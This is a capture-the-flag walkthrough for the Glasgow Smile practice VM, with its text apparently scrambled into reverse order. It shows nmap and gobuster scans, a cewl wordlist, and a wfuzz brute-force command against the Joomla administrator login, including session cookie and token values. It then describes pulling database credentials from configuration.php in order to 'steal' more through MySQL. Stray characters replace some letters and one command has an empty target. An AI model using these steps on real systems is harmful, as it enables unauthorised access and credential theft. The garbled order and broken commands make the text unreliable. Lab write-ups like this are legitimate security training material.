


In order to use this command we need a propper tty. I want to use the mysql command to check the content of the original database and see if there are any credentials to steal. Make sure your template is default, click Extensions > Templateįirst, I take a look for any interesting readable files in /home find /home -ls 2>/dev/nullĬonfiguration.php has mysql username/password Login at /administrator, then click Extensions > Templates > Templates
#Glasgow smile password#
cewl-joomla.txt -hs="Username and password do not match or you do not have an account yet." -X POST -b "6821ee9ea803cd64e2920ca203163e81=fh651031upk1m2cagqe9mcqoma" -d "username=joomla&passwd=FUZZ&option=com_login&task=login&return=aW5kZXgucGhw&099afa929ff747b43ea8f8b58dd2fc0f=1" -u ''Īdding -p '127.0.0.1:8080:HTTP' -follow with burpsuite seems to make the response more reliable. Run wfuzz - Check the output for the first non-hidden response as your csrf token will get burned once you login wfuzz -w. Get a wordlist from the website cewl > cewl-joomla.txt You can do this manually by clearing browser cookies, then hit the login page (/administrator/ by default). Nothing in the page source for index.html, let’s check out Joomla! Joomla Brute force Let’s start with a gobuster scan gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x bak,php,html,txt -u

Ssh user enumeration not working (all users in list valid)Ĭheck this out more later 80/tcp open http - Apache httpd 2.4.38 ((Debian)) Open Ports 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)Ĩ0/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))Ģ2/tcp open ssh - OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) You can contact me on Hack the box or by email ( for hints! Initial Scans nmap -sn 192.168.110.0/24 The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically vmx file in VMware Workstation (tested on VMware Workstation 15.x.x) You need to have enough information about Linux enumeration and encryption for privileges escalation. Anyway, You will find also a bunch of ctf style challanges, it’s important to have some encryption knowledge. The machine is designed to be as real-life as possible. Glasgow Smile is supposed to be a kind of gym for OSCP machines. If you are a newbie in Penetration Testing and afraid of OSCP preparation, do not worry. Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)
